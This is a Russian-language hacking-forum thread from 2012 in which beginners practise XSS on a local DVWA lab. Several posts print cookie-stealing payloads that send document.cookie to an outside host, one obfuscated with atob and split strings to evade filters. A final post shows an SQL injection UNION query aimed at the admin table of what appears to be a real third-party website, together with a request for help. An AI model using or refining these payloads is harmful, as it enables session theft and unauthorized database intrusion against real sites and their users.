ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

12.01.2012, 21:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 6075
Репутация:
0
|
|
О , большое спасибо за обяснения , теперь я понял то что написано в статьях , что пасивная это get , адресная строка а активная post в гостевой например. Спасибо )
|
|
|
|

12.01.2012, 21:54
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме: 4512
Репутация:
0
|
|
NZT, полностью ответить на твой вопрос не смогу, потому что просто не понял его формулировки.
Экранирование кавычек никак не защищает от XSS. Единственное, где экранирование может помешать атаке, это внутри переменной JS при фильтрации угловых скобок и/или слеша.
Конструкция "document.write('" не имеет смысла. JS-код создает тег, который нужен, чтобы выполнить JS-код?
Сообщение от None
(new Image()).src='http://httpz.ru/123.gif?'+escape(document.cookie);
Сообщение от None
document.write('');
|
|
|

12.01.2012, 22:09
|
|
Guest
Сообщений: n/a
Провел на форуме: 90728
Репутация:
62
|
|
Сообщение от NZT
NZT said:
О , большое спасибо за обяснения , теперь я понял то что написано в статьях , что пасивная это get , адресная строка а активная post в гостевой например. Спасибо )
нет. пассивная может быть не только get или post, суть её в том что нужно каждый раз передавать в уязвимый параметр свой скрипт. активная же один раз записывается где-то , в бд например, и дальше уже «работает самостоятельно».
|
|
|
|

12.01.2012, 22:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 6075
Репутация:
0
|
|
Чакэ Спасибо понял , тоесть чтобы пасивная сработала надо чтобы жертва нажала на ссылку , и только при нажатии на ссылку будут высылаться куки , а не при каждом захождении на страницу.
M_script, написал скрипт как ты написал но куки не пришли , может потому что в адресной строке этого сайта куда бы я не заходил нет значения id . Все строки адресов только такие http://localhost/denwer/dvwa/vulnerabilities/xss_s/ . В этом дело?
А если я в гостевой пишу то что ты написал то у меня в первом случае появляется как ты и написал , слово в слово а во втором случае document.write(\'\');
тоесть Ereee пошутил сказав что не получится xss на medium ? но у меня ничего не получается (чтоб я не писал алерт не выскакивает , а я все надписи в статье перепробывал)) Или он не шутил? Я делаю все как написано в статье для новичков но ничего в medium не получается. Для medium нужно уже читать более продвинутые статьи?
|
|
|
|

12.01.2012, 22:55
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме: 4512
Репутация:
0
|
|
Сообщение от None
а во втором случае document.write(\'\');
В таком виде нормально должно быть:
document.write(atob(/PGltZyBzcmM9Imh0dHA6Ly9odHRwei5ydS8xMjMuZ2lmPw==/.source)+escape(document[/co/.source+/okie/.source])+atob(/Ij4=/.source));
|
|
|

12.01.2012, 23:14
|
|
Guest
Сообщений: n/a
Провел на форуме: 29020
Репутация:
55
|
|
Сообщение от None
тоесть Ereee пошутил сказав что не получится xss на medium ? но у меня ничего не получается (чтоб я не писал алерт не выскакивает , а я все надписи в статье перепробывал)) Или он не шутил? Я делаю все как написано в статье для новичков но ничего в medium не получается. Для medium нужно уже читать более продвинутые статьи?
на медиуме прокатывает такая штука, как в XSS reflected так и в XSS stored
Код:
Code:
ipt>alert(/xss/)
в XSS reflected, там просто замена идет
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]'Hello '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]);[/COLOR][/COLOR]
в XSS stored тоже самое считай, только фильтруется переменная $message а $name все той же заменой фильтрует.
|
|
|
|

13.01.2012, 00:00
|
|
Guest
Сообщений: n/a
Провел на форуме: 6075
Репутация:
0
|
|
Наверное вышла новая версия в которой ничего не ломается ))
M_script , trololoman96 , спасибо вам за желание помочь , я уже рад что у меня на low что то получилось , но на медиуме все что вы написали тоже не работает, может у меня что то не так. Единственое что , если кто знает в какой из таких площадок для взлома есть пасивная , а не активная xss, хочу ее испробовать , но не охота все подряд качать и проверять , если кто знает насчет пасивной xss вы мне облегчите задачу.
И в чем разница между xss reflected и stored , у меня только в stored все работало а в reflected ничего не получилось.
|
|
|
|

13.01.2012, 00:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 29020
Репутация:
55
|
|
Сообщение от None
И в чем разница между xss reflected и stored , у меня только в stored все работало а в reflected ничего не получилось.
тут имеется ввиду xss reflected как пассивная и сторед как активная. В reflected, xss пиши в имени, и перед этим либо через оперу отредактируй исходник и убери ограничение в input'е на 10 символов, либо на лету через temper data уже пиши свою xss и все получится
|
|
|
|

13.01.2012, 00:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 6075
Репутация:
0
|
|
trololoman96, ты мне очень помог , я как раз искал пасивную xss. Ограничение у меня не стоит. Продолжу тренироваться . Спасибо.
|
|
|
|

13.01.2012, 02:32
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Код:
Code:
http://www.dun[google]glac.org/index.php?m=module2&v=detailarticle&id=86&ia=1636+and+1=0+union+select+1,2,3,unhex(hex(column_name)),5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x74626c5f61646d696e+limit+0,1--
таблица tbl_admin
помогите только именно с этим запросом
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|